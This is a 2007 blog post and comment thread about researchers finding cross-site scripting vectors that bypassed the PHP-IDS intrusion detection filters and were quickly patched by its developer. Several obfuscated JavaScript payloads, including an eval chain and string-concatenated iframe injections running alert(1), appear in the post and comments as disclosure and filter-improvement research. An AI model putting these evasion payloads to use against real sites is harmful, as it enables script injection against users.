Saturday, September 01, 2007

7 minutes to kill a monster.

Well, a response time of 1 week, is said to be good, Mozilla has 10 f***ing days, Google depending on the complexity of the vulnerability takes between 1 day to a few weeks to fix them, but Mario Heiderich, developer of the PHP-IDS, has an amazing 7 minutes time to pull a patch for a vuln.

A week ago, he talked me about a "call for hacking" to PHP-IDS, and I said it would be really difficult, because the last time, the filters where extremely enforced, so I started playing (before the call for hacking was published), and in an hour I found 3 vectors, and made a PoC, of 666 bytes (that's why it's a monster xD), 2 of them where based on Giorgio Maone window.name vector.

So, I asked Mario, if I have to wait until the call for hacking was published, but he pulled the patch immediatelly.

A few minutes later, I found another HTML vector ("style="anything), that was fixed too.

So he decided to interview me, as a price for winning an unstarted contest :P.

The vectors where:

  • open(name)
  • eval(name)
  • (1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0)
I'm sure that Gareth Heyes, and Giorgio Maone will be the next to find some vectors :)

7 comments:

  1. Yeah sent mario a few :)

    Which he fixed in less than 10 mins!

    Stack overflow:
    arguments.callee(1)

    document write:
    writeln(1)

    ReplyDelete
  2. Here's the biggy now fixed of course :)

    s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=
    0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=
    0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=pa
    rentNode;x.appendChild(i);

    ReplyDelete
  3. hehe cool :D
    I'm surprised that createElement can be called directly
    the parentElement.appendChild thing is pretty cool, I'll use it (for legitimate programming of course hehe)
    There's still an issue in the filters, but I haven't been able to exploit it into a real vector, I'll try again later :P
    Greetz!!

    ReplyDelete
  4. >>(for legitimate programming of course hehe)

    oh yes of course ;)

    Yep string concatenation is their biggest problem as far as I can see. It must be very difficult to avoid false positives. Especially with the latest one I sent em.

    s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+'';
    u1=s1+s2+s3;URL=u1

    ReplyDelete
  5. I sent mario a hacking scratch doc to improve his string concatenation protection and he's updated the code now so even the above is protected against. I'm impressed.

    Looks like we've got our work cut out now Sirdarckcat :)

    Lets see who can get the next one ;)

    ReplyDelete
  6. Hi Sirdarkcat,
    thanks for your kind invitation.
    I'm swamped with work as usual, but I thought it was nice
    joining the party for a little while ;)

    ReplyDelete
  7. "string concatenation is their biggest problem as far as I can see"

    Yep - there are too many possible permutations to fix this problem for ever but I just added a new converter regex and most of the vectors you sent me are now detected properly. Unfortunately I couldn't decode all of the vectors you sent me - especially the one where the chaotic and and needed fragments were mixed together.

    We have similar problems when coming to complex mathematical operations when assembling char code nodes (String.fromCharcode(10*E^10/10*E^9+100)) etc. - luckily those problems can be labeled a s luxury-problems because it not very likely to find a site where you can inject JavaScript directly between script tags without any breaker. At least I hope so ;)

    @Giorgio: Cool ones ;) Will take care of them next.

    Greetings && thx!
    .mario

    ReplyDelete